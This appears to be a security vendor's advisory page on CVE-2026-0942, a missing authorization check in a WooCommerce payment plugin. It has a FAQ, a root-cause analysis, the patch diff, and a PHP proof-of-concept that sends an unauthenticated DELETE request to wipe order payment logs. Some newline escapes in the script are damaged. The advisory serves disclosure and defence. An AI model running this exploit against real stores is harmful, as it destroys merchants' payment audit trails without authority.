What is CVE-2026-0942?

CVE-2026-0942 is a medium severity vulnerability in the Rede Itaú for WooCommerce plugin, versions up to and including 5.1.5. It allows unauthenticated attackers to delete Rede Order Logs metadata from all WooCommerce orders due to a missing authorization check in the clearOrderLogs() function.

How does the vulnerability work?

The vulnerability arises from the lack of proper capability checks on the REST API endpoint for clearing order logs. An attacker can send a DELETE request to the endpoint without any authentication, triggering the deletion of sensitive payment metadata associated with WooCommerce orders.

Who is affected by this vulnerability?

Any WordPress site using the Rede Itaú for WooCommerce plugin version 5.1.5 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the Rede Itaú for WooCommerce plugin. If the version is 5.1.5 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability is fixed in version 5.1.6 of the plugin. Administrators should update the Rede Itaú for WooCommerce plugin to the latest version to ensure that the authorization checks are properly implemented.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that administrators should address it promptly to prevent potential exploitation.

What risks does this vulnerability pose?

Successful exploitation allows attackers to delete important payment logs, which can hinder financial reconciliation, fraud investigations, and customer support operations. While it does not delete orders themselves, it removes critical audit trails.

What is a proof of concept (PoC)?

A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. In this case, a PoC script shows how an unauthenticated attacker can send a DELETE request to the vulnerable endpoint, effectively deleting payment logs.

How can I mitigate the risk if I cannot update immediately?

If immediate updates cannot be performed, consider restricting access to the WordPress site or the specific REST API endpoint using firewall rules or security plugins. This can help prevent unauthorized access until the plugin is updated.

What should I do if I suspect my site has been exploited?

If you suspect exploitation, immediately review your WooCommerce order logs for any unauthorized deletions. Restore any lost data from backups if available, and update the plugin to the patched version to prevent further issues.

Are there any other security measures I should take?

In addition to updating plugins, regularly review user permissions, implement strong authentication methods, and use security plugins that monitor for unauthorized access attempts. Regular backups are also essential for recovery in case of incidents.

Where can I find more information about this vulnerability?

More information about CVE-2026-0942 can be found on the National Vulnerability Database or through security advisories published by the plugin developers. Staying informed about vulnerabilities is key to maintaining a secure WordPress environment.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0942: Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit <= 5.1.5 – Missing Authorization to Unauthenticated Rede Order Logs Deletion (woo-rede)

CVE ID CVE-2026-0942

Plugin woo-rede

Severity Medium (CVSS 5.3)

CWE 306

Vulnerable Version 5.1.5

Patched Version 5.1.6

Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0942:
The Rede Itaú for WooCommerce plugin, versions up to and including 5.1.5, contains a missing authorization vulnerability. The plugin’s REST API endpoint for clearing order logs lacks proper capability checks, allowing unauthenticated attackers to delete payment metadata from all WooCommerce orders. This vulnerability has a CVSS score of 5.3, indicating a medium severity issue.

The root cause is the missing permission callback on the `clearOrderLogs()` function’s REST API registration. In the vulnerable version, the file `woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php` registers the endpoint at line 39-43 with `’permission_callback’ => ‘__return_true’`. This configuration allows any HTTP request, regardless of authentication status, to trigger the `clearOrderLogs()` function. The function then retrieves all WooCommerce orders containing the `lknWcRedeOrderLogs` meta key and deletes this metadata.

Exploitation requires a single HTTP DELETE request to the WordPress REST API endpoint `/wp-json/redeIntegration/clearOrderLogs`. No authentication, nonce, or special parameters are needed. Attackers can use tools like cURL, wget, or automated scripts to send this request. The attack vector is completely unauthenticated, requiring only network access to the WordPress site with the vulnerable plugin active.

The patch in version 5.1.6 replaces the `’permission_callback’ => ‘__return_true’` with `’permission_callback’ => array($this, ‘check_clear_logs_permissions’)`. The new `check_clear_logs_permissions()` function verifies the user has either `manage_woocommerce` or `manage_options` capabilities. The `clearOrderLogs()` function also adds a secondary capability check and implements batch processing with logging. These changes ensure only authorized administrators can execute the log clearing functionality.

Successful exploitation allows attackers to delete the `lknWcRedeOrderLogs` metadata from all WooCommerce orders. This metadata likely contains payment processing logs, transaction details, and debugging information crucial for order reconciliation and dispute resolution. While this does not delete the orders themselves, it removes important payment audit trails, potentially hindering financial reconciliation, fraud investigation, and customer support operations.

Differential between vulnerable and patched code

Code Diff

--- a/woo-rede/Includes/LknIntegrationRedeForWoocommerce.php
+++ b/woo-rede/Includes/LknIntegrationRedeForWoocommerce.php
@@ -184,6 +184,9 @@
         $this->loader->add_filter('plugin_action_links_' . INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME, $this, 'lknIntegrationRedeForWoocommercePluginRowMeta', 10, 2);
         $this->loader->add_filter('plugin_action_links_' . INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE_BASENAME, $this, 'lknIntegrationRedeForWoocommercePluginRowMetaPro', 10, 2);

+        // Adicionar link do Changelog
+        $this->loader->add_filter('plugin_row_meta', $this, 'add_changelog_link', 10, 2);
+
         $this->loader->add_action('rest_api_init', $this->LknIntegrationRedeForWoocommerceEndpointClass, 'registerorderRedeCaptureEndPoint');
         $this->loader->add_filter('woocommerce_gateway_title', $this, 'customize_wc_payment_gateway_pix_name', 10, 2);

@@ -1493,4 +1496,23 @@
             'message' => __('Card brand not found', 'woo-rede'),
         ];
     }
+
+    /**
+     * Adiciona link do Changelog na página de plugins
+     */
+    public function add_changelog_link($plugin_meta, $plugin_file)
+    {
+        // Verificar se é o nosso plugin
+        if (strpos($plugin_file, 'integration-rede-for-woocommerce.php') !== false) {
+            $changelog_link = sprintf(
+                '<a href="%1$s" target="_blank">%2$s</a>',
+                'https://br.wordpress.org/plugins/woo-rede/#developers',
+                __('Changelog', 'woo-rede')
+            );
+
+            $plugin_meta[] = $changelog_link;
+        }
+
+        return $plugin_meta;
+    }
 }
--- a/woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php
+++ b/woo-rede/Includes/LknIntegrationRedeForWoocommerceWcEndpoint.php
@@ -39,7 +39,7 @@
         register_rest_route('redeIntegration', '/clearOrderLogs', array(
             'methods' => 'DELETE',
             'callback' => array($this, 'clearOrderLogs'),
-            'permission_callback' => '__return_true',
+            'permission_callback' => array($this, 'check_clear_logs_permissions'),
         ));

         register_rest_route('woorede', '/s', array(
@@ -55,22 +55,87 @@
         ));
     }

+    /**
+     * Verifica se o usuário tem permissão para limpar logs de pedidos
+     *
+     * @return bool True se autorizado, false caso contrário
+     */
+    public function check_clear_logs_permissions()
+    {
+        // Verifica se o usuário está logado e tem permissão para gerenciar WooCommerce
+        return current_user_can('manage_woocommerce') || current_user_can('manage_options');
+    }
+
     public function clearOrderLogs($request)
     {
-        $args = array(
-            'limit' => -1, // Sem limite, pega todas as ordens
-            'meta_key' => 'lknWcRedeOrderLogs', // Meta key específica
-            'meta_compare' => 'EXISTS', // Verifica se a meta key existe
-        );
-
-        $orders = wc_get_orders($args);
-
-        foreach ($orders as $order) {
-            $order->delete_meta_data('lknWcRedeOrderLogs');
-            $order->save();
+        // Verificação adicional de segurança
+        if (!current_user_can('manage_woocommerce') && !current_user_can('manage_options')) {
+            return new WP_Error(
+                'insufficient_permissions',
+                __('You do not have permission to clear order logs.', 'woo-rede'),
+                array('status' => 403)
+            );
+        }
+
+        // Log da ação para auditoria
+        if (function_exists('wc_get_logger')) {
+            $logger = wc_get_logger();
+            $current_user = wp_get_current_user();
+            $logger->info('Order logs cleared by user', array(
+                'source' => 'rede-security-audit',
+                'user_id' => $current_user->ID,
+                'user_login' => $current_user->user_login,
+                'user_ip' => isset($_SERVER['REMOTE_ADDR']) ? sanitize_text_field(wp_unslash($_SERVER['REMOTE_ADDR'])) : 'unknown',
+                'timestamp' => current_time('mysql')
+            ));
         }

-        return new WP_REST_Response($orders, 200);
+        $deleted_count = 0;
+        $batch_size = 50; // Processa 50 pedidos por vez para evitar esgotamento de memória
+        $offset = 0;
+
+        do {
+            $args = array(
+                'limit' => $batch_size,
+                'offset' => $offset,
+                'meta_key' => 'lknWcRedeOrderLogs',
+                'meta_compare' => 'EXISTS',
+                'return' => 'ids', // Retorna apenas IDs para economizar memória
+            );
+
+            $order_ids = wc_get_orders($args);
+
+            if (empty($order_ids)) {
+                break; // Não há mais pedidos para processar
+            }
+
+            foreach ($order_ids as $order_id) {
+                $order = wc_get_order($order_id);
+                if ($order) {
+                    $order->delete_meta_data('lknWcRedeOrderLogs');
+                    $order->save();
+                    $deleted_count++;
+                }
+
+                // Libera memória do objeto order
+                unset($order);
+            }
+
+            $offset += $batch_size;
+
+            // Força limpeza de memória entre lotes
+            if (function_exists('gc_collect_cycles')) {
+                gc_collect_cycles();
+            }
+
+        } while (count($order_ids) === $batch_size);
+
+        return new WP_REST_Response(array(
+            'success' => true,
+            /* translators: %d: number of orders from which logs were cleared */
+            'message' => sprintf(__('Logs cleared from %d orders.', 'woo-rede'), $deleted_count),
+            'orders_affected' => $deleted_count
+        ), 200);
     }

     public function maxipagoDebitListener($request)
--- a/woo-rede/integration-rede-for-woocommerce.php
+++ b/woo-rede/integration-rede-for-woocommerce.php
@@ -15,7 +15,7 @@
  * @wordpress-plugin
  * Plugin Name:       Integration Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit
  * Description:       Receba pagamentos por meio de cartões de crédito e débito, de diferentes bandeiras, usando a tecnologia de autenticação 3DS e recursos avançados de proteção contra fraudes.
- * Version:           5.1.5
+ * Version:           5.1.6
  * Author:            Link Nacional
  * Author URI:        https://linknacional.com.br/wordpress
  * License:           GPL-3.0+
--- a/woo-rede/lkn-integration-rede-for-woocommerce-file.php
+++ b/woo-rede/lkn-integration-rede-for-woocommerce-file.php
@@ -17,7 +17,7 @@
  * Rename this for your plugin and update it as you release new versions.
  */
 if (! defined('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION')) {
-    define('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION', '5.1.5');
+    define('INTEGRATION_REDE_FOR_WOOCOMMERCE_VERSION', '5.1.6');
 }

 if (! defined('INTEGRATION_REDE_FOR_WOOCOMMERCE_FILE')) {

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0942 - Rede Itaú for WooCommerce — Payment PIX, Credit Card and Debit <= 5.1.5 - Missing Authorization to Unauthenticated Rede Order Logs Deletion

<?php
/**
 * Proof of Concept for CVE-2026-0942
 * Unauthenticated Rede Order Logs Deletion Vulnerability
 * 
 * This script demonstrates how an unauthenticated attacker can delete
 * the 'lknWcRedeOrderLogs' metadata from all WooCommerce orders.
 */

// Configuration - Set your target WordPress site URL
$target_url = 'https://vulnerable-site.com';

// Construct the vulnerable REST API endpoint
$endpoint = '/wp-json/redeIntegration/clearOrderLogs';
$full_url = rtrim($target_url, '/') . $endpoint;

echo "Atomic Edge CVE-2026-0942 PoCn";
echo "Target: $full_urln";
echo "Method: DELETEnn";

// Initialize cURL session
$ch = curl_init();

// Set cURL options for DELETE request
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, 'DELETE');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Disable for testing only
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); // Disable for testing only
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$error = curl_error($ch);

// Close cURL session
curl_close($ch);

// Display results
if ($error) {
    echo "Error: $errorn";
} else {
    echo "HTTP Status Code: $http_coden";
    echo "Response: $responsen";
    
    if ($http_code === 200) {
        echo "n[+] SUCCESS: Order logs metadata deleted from all WooCommerce orders.n";
        echo "    The 'lknWcRedeOrderLogs' meta key has been removed.n";
    } else {
        echo "n[-] FAILED: The endpoint may be patched or inaccessible.n";
    }
}

// Note: This vulnerability affects plugin versions <= 5.1.5
// Patched in version 5.1.6 with proper capability checks
?>

Frequently Asked Questions

What is CVE-2026-0942?
Overview of the vulnerability
CVE-2026-0942 is a medium severity vulnerability in the Rede Itaú for WooCommerce plugin, versions up to and including 5.1.5. It allows unauthenticated attackers to delete Rede Order Logs metadata from all WooCommerce orders due to a missing authorization check in the clearOrderLogs() function.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from the lack of proper capability checks on the REST API endpoint for clearing order logs. An attacker can send a DELETE request to the endpoint without any authentication, triggering the deletion of sensitive payment metadata associated with WooCommerce orders.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Rede Itaú for WooCommerce plugin version 5.1.5 or earlier is affected. Administrators should check their plugin version in the WordPress dashboard to determine if they need to take action.
How can I check if my site is vulnerable?
Steps to identify the risk
To check if your site is vulnerable, navigate to the Plugins section in your WordPress admin panel and look for the Rede Itaú for WooCommerce plugin. If the version is 5.1.5 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Recommended actions for administrators
The vulnerability is fixed in version 5.1.6 of the plugin. Administrators should update the Rede Itaú for WooCommerce plugin to the latest version to ensure that the authorization checks are properly implemented.
What does the CVSS score of 5.3 indicate?
Understanding the severity rating
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the risk is not critical, it is significant enough that administrators should address it promptly to prevent potential exploitation.
What risks does this vulnerability pose?
Potential impact on operations
Successful exploitation allows attackers to delete important payment logs, which can hinder financial reconciliation, fraud investigations, and customer support operations. While it does not delete orders themselves, it removes critical audit trails.
What is a proof of concept (PoC)?
Demonstration of the vulnerability
A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. In this case, a PoC script shows how an unauthenticated attacker can send a DELETE request to the vulnerable endpoint, effectively deleting payment logs.
How can I mitigate the risk if I cannot update immediately?
Temporary measures for protection
If immediate updates cannot be performed, consider restricting access to the WordPress site or the specific REST API endpoint using firewall rules or security plugins. This can help prevent unauthorized access until the plugin is updated.
What should I do if I suspect my site has been exploited?
Steps for incident response
If you suspect exploitation, immediately review your WooCommerce order logs for any unauthorized deletions. Restore any lost data from backups if available, and update the plugin to the patched version to prevent further issues.
Are there any other security measures I should take?
Best practices for WordPress security
In addition to updating plugins, regularly review user permissions, implement strong authentication methods, and use security plugins that monitor for unauthorized access attempts. Regular backups are also essential for recovery in case of incidents.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-0942 can be found on the National Vulnerability Database or through security advisories published by the plugin developers. Staying informed about vulnerabilities is key to maintaining a secure WordPress environment.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations